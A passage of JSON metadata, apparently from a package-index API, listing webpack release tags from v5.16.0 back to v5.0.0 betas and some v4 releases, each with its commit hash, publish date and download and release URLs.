https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6